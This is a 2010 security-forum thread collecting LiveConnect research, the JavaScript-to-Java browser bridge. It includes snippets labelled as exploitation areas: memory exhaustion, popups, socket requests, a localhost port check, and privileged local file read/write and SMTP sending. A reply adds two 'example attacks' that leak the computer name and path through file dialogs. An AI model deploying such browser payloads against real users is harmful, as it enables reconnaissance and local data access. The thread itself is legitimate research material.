Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
LiveConnect research.
Posted by: SAS
Date: February 17, 2010 04:04PM

LIVECONNECT - Some research I did couple of years ago, might be useful to share. This is gathered and not everything might work as it contains test cases I wrote, and snippets from other resources which maybe cannot be found elsewhere anymore.

Introduction
LiveConnect is a library that permits JavaScript and Java virtual machines to interoperate. Specifically, it enables JavaScript to access Java fields, invoke Java methods and enables Java to access JavaScript object properties and evaluate arbitrary JavaScript. LiveConnect was originally an integrated feature of both the Netscape Navigator browser and Netscape's server-side JavaScript. Now, it is a standalone library that can be embedded within other projects, such as the Mozilla browser.

Further reading.
General: https://developer.mozilla.org/en/LiveConnect
Mozilla Source: http://mxr.mozilla.org/mozilla1.9.2/search?string=liveconnect
MDC: https://developer.mozilla.org/en/Core_JavaScript_1.5_Guide/LiveConnect_Overview/JavaScript_to_Java_Communication

Overview.






Java enabled check:
alert("Java enabled: " + navigator.javaEnabled());

Java version
var ja = java.lang.System.getProperty("java.version");
alert(ja)

Talk to Java console:
var println_method = java.lang.System.out.println;
println_method("Hello world!");


Possible targets/exploitation areas

Generating lots of strings.

<script>

for(i=0;i<7000;++i) {
  java.lang.reflect.Array.newInstance(java.lang.String, 200);
			
}

</script>

Popup abuse:

function newpopup() {

var p = new java.awt.Frame('My Crappy Popup');
with (p){
      stuff = new java.awt.TextArea('My popup message', 10,100); 
      setLayout(new java.awt.BorderLayout());	
      p.add('Center', stuff);
      p.pack();
      p.show(); 	
      p.setLocation(200,200);	
      p.setVisible(true);
  }
}

JAVA RMI:

<script>

// this is a client request snippet, it does not encompass the actual RMI server that listens to a registry request.

c = java.rmi.registry.LocateRegistry; 
r = c.getRegistry("lul.z.com"); 
s = r.lookup("lol"); 
s.requestService();

</script>


i. JSObject Methods

------------------------------------------------------------------------
public static JSObject getWindow(Applet a)
------------------------------------------------------------------------
public Object call(String methodName, Object args[ ])
JS eqv. to: this.methodName(args[0], args[1], ...)
------------------------------------------------------------------------
public Object eval(String s)
------------------------------------------------------------------------
public Object getMember(String name)
JS eqv. to: this.name
------------------------------------------------------------------------
public Object getSlot(int index)
eqv. to: this[index]
------------------------------------------------------------------------
public void setMember(String name, Object value)
eqv. to: this.name = value
------------------------------------------------------------------------

ii. JSObject examples

JSObject doc = (JSObject) window.getMember("document");  
JSObject myform = (JSObject) doc.getMember("someFormName");  
JSObject someTextField = (JSObject)
myform.getMember("someTextFieldName");  
int screenHeight = (int) window.getMember("screen.height");

iii. Alert & Eval

String[] message = { "Message." }
window.call("alert", message);

window.eval("alert(\"Message.\");");

iv. JS/Java

var today = new java.util.Date();
System.out.println(today);


v. Packages
Java package is [Package.]<packageName>.<className>.<methodName>.

Does not need Package prefix: 
java.*, sun.* & netscape.*

The same:
var Vec = new java.util.Vector();
var Vec = new Packages.java.util.Vector();




vi. Applets
<APPLET CODE=”applet.class” NAME="" WIDTH="" HEIGHT="">

MAYSCRIPT: Pluging reference to JS

Index: document.applets[0]

Applet method summary:
http://java.sun.com/j2se/1.5.0/docs/api/java/applet/Applet.html


vii. Plugin communication

document.myPlugin.Play();
document.myPlugin.StopPlay();
TGetProperty( target, property) // Flash
TSetProperty("/MovieClip", visibilityIndex, 1) // Flash


viii. Java NET/Sockets.

var url = new java.net.URL("http://www.foo.com:666/bar.html");

getProtocol();	http
getHost();	www.foo.com
getPort();	666
getPath();	/bar.html

Read:

<script>

  function LiveRead(URL) {
    var result = '';
    var destination = new java.net.URL(URL);
    var input = java.io.DataInputStream(destination.openStream());

    while ((line = input.readLine()) != null) {
      result += line;
      result += java.lang.System.getProperty('line.separator');
    }

    input.close();
    alert(result);
  }

</script>

HelloLiveConnect.java

import java.awt.*;

public class HelloLiveConnect extends java.applet.Applet
{
   public String sMessage; // text message

   public void db(String sText)
   {
      System.out.println(sText);
   }

   public String getJavaVersion()
   {
      return "Java version: " + System.getProperty("java.version");
   }

   public void init()
   {
      // init global values
      sMessage = getParameter("message");
      if (sMessage==null) sMessage = "<Parameter missing>";

      //  paint the applet
      repaint();
   }

   public void paint(Graphics g)
   {
      // draw background
      g.setColor(Color.blue); // blue
      g.fillRect(0,0, getSize().width, getSize().height);

      //  draw message
      g.setColor(Color.white);
      g.drawString(sMessage, 0, 20);
   }
}

JS:

alert(document.myApplet.sMessage);
document.myApplet.db("We are LiveConnected!");
alert(document.myApplet.getJavaVersion());

getHTTPHeader example:


function getHTTPHeader(sURL)
{
   var url      = new java.net.URL(sURL);
   var hostname = url.getHost();
   var port     = url.getPort();
   if (port == -1) port = 80;         // default HTTP port

   var sock = new java.net.Socket(hostname, port);
   sock.setSoTimeout(30 * 1000);        // 30 secs
   var din = new java.io.DataInputStream(sock.getInputStream());
   var dout = new java.io.DataOutputStream(sock.getOutputStream());
   var con = "", line = "";
   var CRLF = "\r\n";
   var request =
      "HEAD " + url.getFile() + " HTTP/1.1" + CRLF +
      "Host: " + hostname + ":" + port + CRLF +
      "User-agent: " + navigator.userAgent + CRLF +
      CRLF;

   dout.writeBytes(request);
   dout.flush();

   while ((line=din.readLine()) != null && (line!=""))
      con += line + "\n";

   return con;
}

Port Check example.

<script>
function portcheck(port) 
{
    var used = false;
    
    try {
        var socket = new 

java.net.ServerSocket(port,1,java.net.InetAddress.getByName("localhost"));
        socket.close();
    } catch (e) {
        alert(e);
        used = true;
    }
    
    return alert(used);
} 
portcheck(10);
</script>

GUI

// button:
java.awt.Button

// popup:
var f = new java.awt.Frame("Hello World");
var ta = new java.awt.TextArea("hello, world", 5, 20);
f.add("Center", ta);
f.pack();
f.show();

Frame:


var fMain = new java.awt.Frame("Hello Java");
with (fMain)
{
   tbInput = new java.awt.TextArea(
   "The quick\nbrown fox\njumps over\nthe lazy dog.", 15,60);

   setLayout(new java.awt.BorderLayout());
   add(tbInput, "Center");
   pack();
   setLocation(0,0);
   setVisible(true);
}

Dialog:

fFile = new java.awt.FileDialog(
        fMain, "Datei öffnen", java.awt.FileDialog.LOAD);
with (fFile)
{
   show();
   var fn = getFile();
   if (fn)
   {
      fn = getDirectory() + fn;
      var fp = new java.io.File(fn);
      alert(fn + " size: " + fp.length());
   }
}


May not work anymore, this is only for illustration of what is/was possible.

SMTP support:

<SCRIPT LANGUAGE="JavaScript1.2" ID="Ex8">

function sendMail(subject, body) {
    netscape.security.PrivilegeManager.enablePrivilege("UniversalPreferencesRead");
    var recipient = navigator.preference("mail.identity.useremail");
    var smtp_server = navigator.preference("network.hosts.smtp_server");

    netscape.security.PrivilegeManager.enablePrivilege("UniversalConnect");
    var response = java.lang.System.out.println;
    var smtp = new java.net.Socket(smtp_server, 25);
    var smtpIn = new java.io.DataInputStream(smtp.getInputStream());
    var smtpOut = new java.io.PrintStream(smtp.getOutputStream());

    smtpOut.println("HELO " + smtp_server);
    response(smtpIn.readLine());
    response(smtpIn.readLine());
    smtpOut.println("MAIL FROM: " + recipient);
    response(smtpIn.readLine());
    smtpOut.println("RCPT TO: " + recipient);
    response(smtpIn.readLine());
    smtpOut.println("DATA");
    response(smtpIn.readLine());
    smtpOut.println("Subject: " + subject);
    smtpOut.println("X-Mailer: LiveConnect");
    smtpOut.println("MIME-Version: 1.0");
    smtpOut.println("Content-Type: text/html");
    smtpOut.println("");
    smtpOut.println(body);
    smtpOut.println(".");
    smtpOut.println("QUIT");
    response(smtpIn.readLine());
}

sendMail('foo', 'bar');

</script>

DB support:

<SCRIPT LANGUAGE="JavaScript1.2" ID="Ex6">

function setDatabaseRecord(name, value) {
    netscape.security.PrivilegeManager.enablePrivilege("UniversalPropertyRead");
    var userHome = java.lang.System.getProperty("user.home");
    var fileSeparator = java.lang.System.getProperty("file.separator");
    var fileName = userHome + fileSeparator + 'myDatabase.txt';
    
netscape.security.PrivilegeManager.enablePrivilege("UniversalFileAccess");
    var raf = new java.io.RandomAccessFile(fileName, "rw");
    var fis = new java.io.FileInputStream(fileName);
    var ds  = new java.io.DataInputStream(fis);
    var data = new Array();
    var line   = "";
    var record = true;
    while ((line = ds.readLine()) != null) {
        if (line.startsWith(name + "=")) {
            line = name + "=" + value;
            record = false;
            java.lang.System.err.println("replacing: " + line);
        }
        data[data.length] = line;
    }
    fis.close();
    if (record) {
        data[data.length] = name + "=" + value;
    }
    var fps  = new java.io.PrintStream(new 
java.io.FileOutputStream(fileName));
    for (var i in data) {
        fps.println(data);
        java.lang.System.err.println("data[" + i + "]=" + data);
    }
    fps.close();
}

setDatabaseRecord('bla', 'foobar')

</script>

Read local file:

<SCRIPT LANGUAGE="JavaScript1.2" ID="Ex5">

function readFile(fileName) {
    netscape.security.PrivilegeManager.enablePrivilege("UniversalPropertyRead");
    var userHome = java.lang.System.getProperty("user.home");
    var fileSeparator = java.lang.System.getProperty("file.separator");
    var fileName = userHome + fileSeparator + 'myFile.txt';

    netscape.security.PrivilegeManager.enablePrivilege("UniversalFileAccess");
    var fis  = new java.io.FileInputStream(fileName);
    var ds   = new java.io.DataInputStream(fis);
    var fileData = "";
    var line    = "";
    while ((line = ds.readLine()) != null) { 
        line.toString();
        fileData += line.substring(2, line.length()) + "\n"; 
    }
    fis.close();
    alert(fileData);
}

readFile('tester.txt')

</script>

Write local file:

<SCRIPT LANGUAGE="JavaScript1.2" ID="Ex4">

function writeFile(fileName, data) {
    // The following calls require Object Signing
    netscape.security.PrivilegeManager.enablePrivilege("UniversalPropertyRead");
    var userHome = java.lang.System.getProperty("user.home");
    var fileSeparator = java.lang.System.getProperty("file.separator");
    var fileName = userHome + fileSeparator + (fileName || 'myFile.txt');
    
    netscape.security.PrivilegeManager.enablePrivilege("UniversalFileAccess");
    var raf = new java.io.RandomAccessFile(fileName, "rw");
    raf.seek(raf.length());
    raf.writeUTF(Date() + "::" + data + "\n");
    raf.close();
    java.lang.System.out.println(Date() + "::" + data + "\n");
}

writeFile('tester.txt', 'abc');

</script>

Browse file:

<SCRIPT LANGUAGE="JavaScript" ID="Ex1">

function browse() {
    var Frame = new java.awt.Frame();
    var fd = new java.awt.FileDialog(Frame, "Browse File", 
java.awt.FileDialog.LOAD);
    fd.toFront();
    fd.show();
    var getDirectory = new java.awt.FileDialog(Frame);
    var filename = fd.getDirectory() + fd.getFile();
    alert('You selected: ' + filename);
}
browse();
</SCRIPT>



Edited 5 time(s). Last edit at 02/17/2010 04:36PM by SAS.

Options: ReplyQuote
Re: LiveConnect research.
Posted by: Gareth Heyes
Date: February 17, 2010 04:11PM

Nice information gold

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: LiveConnect research.
Posted by: Skyphire
Date: April 06, 2010 07:15PM

I have to restate that LiveConnect is no longer with Mozilla, instead they hook it directly into a Java plugin. I'm not sure yet what is more dangerous,
because Java supports even more native features than LiveConnect did, they now rely on Java to get stuff done & secure.

I've produced two example attacks over the Easter weekend.


I. Computer name & Path discovery.

<script>

// CPtest
// Stealing computer names (3rd time)
// Should work in Mozilla 3.5+ (Microsoft platform only: java.exe)
// By Skyphire.

function s() {

    var Frame = new java.awt.Frame();
	
    var f = new java.awt.FileDialog(Frame, "Browse File", java.awt.FileDialog.LOAD);
	
    f.show();
    f.toFront();

    var getDirectory = new java.awt.FileDialog(Frame);

    // sometimes the dailog hides
    f.toFront();

	alert("Computer name & file location: \r\n" + f.getDirectory() + f.getFile());
}

</script>

<label>
<input type="text" name="dum" size="20" onfocus="s()"><input type="button" name="s" value="Browse..." onclick="s()"/>
</label>


II. Floppy!

<script>

// Floppy! 
// Maybe possible to do recon this way?
// Hey, at least it makes some noise !
// tested on Firefox 3.5+ WinXp, java.exe.
// By Skyphire

var o = new java.awt.Frame();
var f = new java.awt.FileDialog(o, "Save As", java.awt.FileDialog.SAVE);

// Any DIR we like.
f.setDirectory("A:\\");

// We can't, because of security policy for now. (or can we?) 
f.setFile("foo.boot");

f.show(); 

</script>



Edited 1 time(s). Last edit at 12/13/2011 05:17AM by Skyphire.

Options: ReplyQuote


Sorry, only registered users may post in this forum.